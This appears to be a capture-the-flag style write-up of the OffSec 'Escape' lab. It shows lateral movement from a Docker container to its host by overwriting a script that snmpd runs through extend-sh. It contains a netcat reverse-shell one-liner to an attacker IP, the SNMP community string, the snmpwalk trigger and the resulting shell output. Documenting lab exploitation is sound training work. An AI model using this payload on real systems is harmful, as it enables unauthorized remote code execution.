InfoSec LAB

Escape_OffSec_Lateral_Movement_debian-snmp

Created: 3 min read

debian-snmp

During an assessment of the Docker host, a7c367c2113d, the discovery of the SNMP configuration file (/var/backups/.snmpd.conf) revealed the execution of a custom Bash script (/tmp/shtest). This execution was facilitated using the extend-sh feature. The execution was later confirmed. Furthermore, the configuration included a read-only community string, which provided extensive information about the host system.

Additionally, the CDK tool detected that the /tmp directory of the container is directly mounted to the Docker host’s /tmp directory. This configuration presents a potential security risk, as it allows an attacker to create or modify the /tmp/shtest script within the container. Since the SNMP daemon executes this script, it may be leveraged to achieve code execution on the host system, posing a significant security vulnerability.

www-data@a7c367c2113d:/var/tmp$ cat /proc/self/mountinfo | grep -w /tmp
 
445 425 8:1 /tmp /tmp rw,relatime - ext4 /dev/sda1 rw,errors=remount-ro,data=ordered

This can be checked manually; /proc/self/mountinfo

www-data@a7c367c2113d:/var/tmp$ echo -n 'mkfifo /tmp/tlfglg; nc 192.168.45.153 6666 0</tmp/tlfglg | /bin/sh >/tmp/tlfglg 2>&1; rm /tmp/tlfglg' > /tmp/shtest

Creating the /tmp/shtest file with the reverse shell payload

┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/escape_offsec]
└─$ snmpwalk -v 1 -c 53cur3M0NiT0riNg $IP iso.3.6.1.4.1.8072.1.3.2
iso.3.6.1.4.1.8072.1.3.2.1.0 = INTEGER: 3
iso.3.6.1.4.1.8072.1.3.2.2.1.2.5.116.101.115.116.49 = STRING: "/bin/echo"
iso.3.6.1.4.1.8072.1.3.2.2.1.2.5.116.101.115.116.50 = STRING: "echo"
iso.3.6.1.4.1.8072.1.3.2.2.1.2.5.116.101.115.116.51 = STRING: "/bin/sh"
iso.3.6.1.4.1.8072.1.3.2.2.1.3.5.116.101.115.116.49 = STRING: "Hello, world!"
iso.3.6.1.4.1.8072.1.3.2.2.1.3.5.116.101.115.116.50 = STRING: "Hello, world! ; echo Hi there ; exit 35"
iso.3.6.1.4.1.8072.1.3.2.2.1.3.5.116.101.115.116.51 = STRING: "/tmp/shtest"
iso.3.6.1.4.1.8072.1.3.2.2.1.4.5.116.101.115.116.49 = ""
iso.3.6.1.4.1.8072.1.3.2.2.1.4.5.116.101.115.116.50 = ""
iso.3.6.1.4.1.8072.1.3.2.2.1.4.5.116.101.115.116.51 = ""
iso.3.6.1.4.1.8072.1.3.2.2.1.5.5.116.101.115.116.49 = INTEGER: 5
iso.3.6.1.4.1.8072.1.3.2.2.1.5.5.116.101.115.116.50 = INTEGER: 5
iso.3.6.1.4.1.8072.1.3.2.2.1.5.5.116.101.115.116.51 = INTEGER: 5
iso.3.6.1.4.1.8072.1.3.2.2.1.6.5.116.101.115.116.49 = INTEGER: 1
iso.3.6.1.4.1.8072.1.3.2.2.1.6.5.116.101.115.116.50 = INTEGER: 2
iso.3.6.1.4.1.8072.1.3.2.2.1.6.5.116.101.115.116.51 = INTEGER: 2
iso.3.6.1.4.1.8072.1.3.2.2.1.7.5.116.101.115.116.49 = INTEGER: 1
iso.3.6.1.4.1.8072.1.3.2.2.1.7.5.116.101.115.116.50 = INTEGER: 1
iso.3.6.1.4.1.8072.1.3.2.2.1.7.5.116.101.115.116.51 = INTEGER: 1
iso.3.6.1.4.1.8072.1.3.2.2.1.20.5.116.101.115.116.49 = INTEGER: 4
iso.3.6.1.4.1.8072.1.3.2.2.1.20.5.116.101.115.116.50 = INTEGER: 4
iso.3.6.1.4.1.8072.1.3.2.2.1.20.5.116.101.115.116.51 = INTEGER: 4
iso.3.6.1.4.1.8072.1.3.2.2.1.21.5.116.101.115.116.49 = INTEGER: 1
iso.3.6.1.4.1.8072.1.3.2.2.1.21.5.116.101.115.116.50 = INTEGER: 1
iso.3.6.1.4.1.8072.1.3.2.2.1.21.5.116.101.115.116.51 = INTEGER: 1
iso.3.6.1.4.1.8072.1.3.2.3.1.1.5.116.101.115.116.49 = STRING: "Hello, world!"
iso.3.6.1.4.1.8072.1.3.2.3.1.1.5.116.101.115.116.50 = STRING: "Hello, world!"

Invoking the payload by sending a SNMP query

┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/escape_offsec]
└─$ nnc 6666                                                            
listening on [any] 6666 ...
connect to [192.168.45.153] from (UNKNOWN) [192.168.122.113] 53096
whoami
Debian-snmp
hostname
escape
ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
       valid_lft forever preferred_lft forever
    inet6 ::1/128 scope host 
       valid_lft forever preferred_lft forever
3: docker0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue state UP group default 
    link/ether 02:42:7e:d3:9c:0e brd ff:ff:ff:ff:ff:ff
    inet 172.17.0.1/16 brd 172.17.255.255 scope global docker0
       valid_lft forever preferred_lft forever
    inet6 fe80::42:7eff:fed3:9c0e/64 scope link 
       valid_lft forever preferred_lft forever
5: vethe544e37@if4: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue master docker0 state UP group default 
    link/ether 92:34:d7:75:cf:89 brd ff:ff:ff:ff:ff:ff link-netnsid 0
    inet6 fe80::9034:d7ff:fe75:cf89/64 scope link 
       valid_lft forever preferred_lft forever
6: ens192: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc fq_codel state UP group default qlen 1000
    link/ether 00:50:56:9e:06:af brd ff:ff:ff:ff:ff:ff
    inet 192.168.122.113/24 brd 192.168.122.255 scope global ens192
       valid_lft forever preferred_lft forever

Lateral Movement made to the escape host as the Debian-snmp account via exploiting a mount misconfiguration

Interactive Graph View

Backlinks